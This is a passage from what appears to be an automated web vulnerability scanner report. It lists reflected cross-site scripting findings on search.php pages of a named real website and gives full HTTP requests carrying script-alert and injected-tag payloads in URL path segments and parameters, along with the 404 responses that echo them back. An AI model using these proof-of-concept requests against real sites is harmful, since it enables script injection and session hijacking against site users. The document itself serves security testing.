This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult8e6bd<script>alert(1)</script>e770d40c3b/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult8e6bd<script>alert(1)</script>e770d40c3b/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.136. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de2e<script>alert(1)</script>04a4cb43f12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat8de2e<script>alert(1)</script>04a4cb43f12/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat8de2e<script>alert(1)</script>04a4cb43f12/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.137. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f3dc<script>alert(1)</script>6e261733c4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes8f3dc<script>alert(1)</script>6e261733c4a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes8f3dc<script>alert(1)</script>6e261733c4a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.138. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b52b<script>alert(1)</script>2a8d2374a43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos5b52b<script>alert(1)</script>2a8d2374a43/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos5b52b<script>alert(1)</script>2a8d2374a43/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.139. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2bb3e<script>alert(1)</script>a1cce950054 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images2bb3e<script>alert(1)</script>a1cce950054/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images2bb3e<script>alert(1)</script>a1cce950054/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.140. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 89eff<script>alert(1)</script>6824ae2567c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review89eff<script>alert(1)</script>6824ae2567c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review89eff<script>alert(1)</script>6824ae2567c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.141. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4e30c<script>alert(1)</script>e5e22f8a0f5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php4e30c<script>alert(1)</script>e5e22f8a0f5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php4e30c<script>alert(1)</script>e5e22f8a0f5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.142. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c29f5<a>62ebc666ddd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc29f5<a>62ebc666ddd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchc29f5<a>62ebc666ddd&opt=2 was not found on this server.</p>
...[SNIP]...

2.143. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 65ccc<a>115fd774aa6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...65ccc<a>115fd774aa6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...65ccc<a>115fd774aa6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.144. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18ce2<script>alert(1)</script>7f68e9f9f31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&18ce2<script>alert(1)</script>7f68e9f9f31=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&18ce2<script>alert(1)</script>7f68e9f9f31=1 was not found on this server.</p>
...[SNIP]...

2.145. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c3d7f<a>8e2b502571b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c3d7f<a>8e2b502571b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c3d7f<a>8e2b502571b was not found on this server.</p>
...[SNIP]...

2.146. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c620e<script>alert(1)</script>679bc3bf1eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultc620e<script>alert(1)</script>679bc3bf1eb/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultc620e<script>alert(1)</script>679bc3bf1eb/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.147. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f726b<script>alert(1)</script>7fe79ebd066 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatf726b<script>alert(1)</script>7fe79ebd066/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatf726b<script>alert(1)</script>7fe79ebd066/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.148. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fd583<script>alert(1)</script>5575119c5bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesfd583<script>alert(1)</script>5575119c5bb/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesfd583<script>alert(1)</script>5575119c5bb/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.149. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fc3f<script>alert(1)</script>7961829ed26 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos4fc3f<script>alert(1)</script>7961829ed26/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos4fc3f<script>alert(1)</script>7961829ed26/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.150. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 64fed<script>alert(1)</script>b229029b47c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images64fed<script>alert(1)</script>b229029b47c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images64fed<script>alert(1)</script>b229029b47c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.151. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e8edd<script>alert(1)</script>d5b9452e74e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/search.phpe8edd<script>alert(1)</script>d5b9452e74e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/search.phpe8edd<script>alert(1)</script>d5b9452e74e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.152. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7f8dc<a>c7aea4a1b23 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f8dc<a>c7aea4a1b23&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
